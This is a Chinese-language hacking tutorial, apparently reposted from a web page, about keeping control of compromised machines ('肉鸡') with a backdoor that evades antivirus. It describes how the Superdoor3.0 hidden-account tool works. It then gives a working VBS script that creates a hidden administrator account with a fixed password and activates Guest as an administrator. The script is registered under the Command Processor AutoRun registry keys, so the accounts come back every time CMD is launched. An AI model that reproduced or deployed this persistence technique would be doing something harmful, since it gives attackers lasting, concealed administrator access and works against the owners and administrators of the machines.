在安全观念日益强化的今天,想得到台属于自己的肉鸡是不易的,如果说因为管理员发现了自己留在肉鸡上的后门账号而导致肉鸡丢失的话,那就是世间最痛苦的事了,相信大家都不会希望这种事情发生在自己的身上吧!这时候用什么后门来控制肉鸡就成为最让人头疼的问题,而好后门的关键就在于是否会被查杀,下文一起来看看如何打造出自己的免查杀后门吧!
Superdoor3.0这款软件大家都用过或者听过吧?它只有一个可执行程序,文件本身很小,命令简单,
教你打造杀毒软件免杀的后门
。运行后,可以起到隐藏账号的效果,管理员在CMD下用“net user”查看door <用户名>:<口令>
小提示:Superdoor3.0(超级后门3.0),超级用户隐藏器。
运行环境:测试2000通过(须VB运行库)。
运行方法:door <用户>:<密码>例:administrator:123。
功能:它在打开“计算机管理”和CMD时把用户删掉,管理员看过用户后,关闭“计算机管理”或CMD时,用户又回来了,巧妙地躲开管理员的查看,是宝鸡必备良药。
不过使用这个后门建立隐藏帐户容易,后门被发现也很容易。我使用杀毒软件(Norton Anti Virus)查了一下。在/winnt/system32/下会生成一个Cmd.exe文件和感染Conpmgmt.exe文件。
哎,看来Superdoor早就被列入杀毒名单了。而且在杀毒软件将后门程序删除后,再运行CMD命令行回在它上面多出一句:“c:\WINNT\system32\crnd.exe"不是外部或内部命令,也不是可运行的程序或批处理文件”。
看来是文件关联被动了手脚了。经过查找,发现程序写入下面两个键值:
HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\下的\Software\Microsoft\Command Processor\Auto Run
先看看这两个位置的介绍:如果/D未在命令行上被指定,当Cmd.exe运行时,它会自动寻找以下Reg_sz/reg_expand_sz注册表变量,
电脑资料
《教你打造杀毒软件免杀的后门》(https://www.unjs.com)。如果其中一个或两个都存在,这两个变量会先予执行。也就是说,只要启动了CMD就会运行上述的脚本,可以说是CMD关联吧。达到“账号如果被撤除,运行CMD又恢复”的效果,原理就是这样的了。现在我们来根据原理做个不被杀的后门。先建立一个名字为RUN的VBS文件,保存在C:/winnt/system32/下,内容如下:
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user hsmw$ qq26836659",0
wsh.run "net localgroup administrators hsmw$ /add",0
wsh.run "net user guest /active:yes",0
wsh.run "net user guest qq26836659",0
wsh.run "net localgroup administrators hsmw$ /add",0
上面一段VBS的意思就是建立个hsmw$的账号,并且加为高级管理组,设置密码为QQ26836659,激活Guest账号,并且加为高级管理组,设置密码为qq26836659。写入注册表中下面的键,关联CMD达到不死的效果:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\Auto Run
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\Auto Run
小提示:在账号后面加入$是为了在输入“net user”时不被轻易地发现,虽然是个“不死账号”,但是在计算机管理可以轻易的查到。